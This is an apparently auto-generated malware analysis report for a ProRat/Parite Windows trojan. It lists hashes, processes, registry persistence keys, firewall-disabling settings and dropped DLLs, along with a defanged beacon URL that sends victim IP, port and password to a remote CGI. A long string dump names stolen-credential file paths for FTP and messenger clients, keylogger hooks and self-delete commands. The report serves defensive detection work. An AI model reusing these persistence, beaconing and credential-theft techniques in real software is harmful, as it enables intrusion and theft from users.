Virus.Win32.Parite_edfb10fc95

by malwarelabrobot on June 29th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Prorat.INJ (B) (Emsisoft), Trojan.Prorat.INJ (AdAware), Trojan.Win32.Bumat.FD, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: edfb10fc95c230dff4c1551bfd72f74c
SHA1: ecfe9208216b1154b81777224d95ee68da018610
SHA256: 0039eea91994b18a74aec4966d5cc66b80eb6ccdd092f723e8c7a71764b53c8f
SSDeep: 6144:VF8jQMQtt0JiWBFSbEbu jaTvacPbkgo54UCodblRGxc1xDtFWA9rmNlHvXQFhrg:VF8jAtYB22azaLgzaLUcDDWCrmDvgFhc
Size: 347692 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2005-06-02 13:36:26
Analyzed on: WindowsXP SP3 32-bit


Summary:

Virus. A program that recursively replicates a possibly evolved copy of itself.

Payload

No specific payload has been found.

Process activity

The Virus creates the following process(es):

NET.exe:640
NET.exe:1860
fservice.exe:220
net1.exe:1072
net1.exe:1972

The Virus injects its code into the following process(es):

%original file name%.exe:1540
services.exe:608

Mutexes

The following mutexes were created/opened:

DBWinMutex
ShimCacheMutex
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex

File activity

The process fservice.exe:220 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

%WinDir%\services.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)

The Virus deletes the following file(s):

%System%\fservice.exe (0 bytes)
%WinDir%\system\sservice.exe (0 bytes)

The process %original file name%.exe:1540 makes changes in the file system.
The Virus creates and/or writes to the following file(s):

%System%\fservice.exe (2105 bytes)
%WinDir%\system\sservice.exe (2105 bytes)

Registry activity

The process NET.exe:640 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 4B F2 6C 83 94 2E F6 1B AE B4 63 50 A0 E9 FB"

The process NET.exe:1860 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 A6 F9 E2 A5 A7 2A 2D 40 82 B9 37 CD FC 90 84"

The process fservice.exe:220 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 93 AB 94 0F 1D 3A 8F F4 E1 78 70 79 DB A3 DF"

The process net1.exe:1072 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 19 BF 76 DC 07 91 46 50 42 3D F3 FD 65 2F 2D"

The process net1.exe:1972 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 F1 CC 08 69 FF BC DE 8A 8C C1 A6 09 7D 40 5B"

The process %original file name%.exe:1540 makes changes in the system registry.
The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 A1 A5 85 E3 62 85 8D 5E E3 3B 29 97 43 20 95"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "%System%\fservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = "xnt/on,hq/bnl"
"LanNotifie" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "%WinDir%\system\sservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "whbuhl"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "1"
"Hata" = "Wrong Click Bro! ;)"
"Port" = "4001"
"Sifre" = "032547"
"Mail" = ""
"ICQ_UIN2" = "046007686"
"FW_KILL" = "1"

"Online_List" = "iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh"
"KSil" = "1"

The Virus adds the reference to itself to be executed when a user logs on:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe %System%\fservice.exe"

Dropped PE files

MD5 File path
d4a3f90e159ffbcbc4f9740de4b7f171 c:\WINDOWS\system32\reginv.dll
43e7d9b875c921ba6be38d45540fb9dd c:\WINDOWS\system32\winkey.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 1736704 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 1740800 344064 343040 5.48775 0ebf164efa8ae858f757195ae60973a9
.rsrc 2084864 4096 3584 1.99908 ecf998477415866dbec7c9686ec70604

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
c14ec009cf99410839d16cfe4ca50398

URLs

URL IP
hxxp://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=XP_&ipadresi=192.168.1.121&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-18&serversaati=1:59:35_AM&servertarihi=6/28/2014&serversifre=123456&islem=log 69.43.160.216
www.icq.com 178.237.20.20


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

The Virus connects to the servers at the folowing location(s):

%original file name%.exe_1540:

`.rsrc
Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
TFtpServerX
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbortt
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpCli4
OnProcessHeader
TSyncSmtpCli
smtp
SMTP component not ready
Uhk%D
SMTP component not connected
SMTP component already connected
426 Operation aborted.
.htPD
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException0_D
EFtpCtrlSocketException
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWord$
220-ICS FTP Server ready
Addressh
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeys42E
AutoHotkeysx2E
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowState44E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
Pplugin4.dat
%s0x%1h
?Key[oku
.rd@a
KERNEL32.DLL
ADVAPI32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
.text
`.rdata
@.data
.rsrc
@.reloc
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
hodll.dll
[Windows title: "%s"]
\ktd32.atm
.HookSec
.reloc
B[* ProRat - Trojan Horse - Coded by PRO Group - Made in Turkey *]
user32.dll
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\http://www.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: http://www.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
www.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
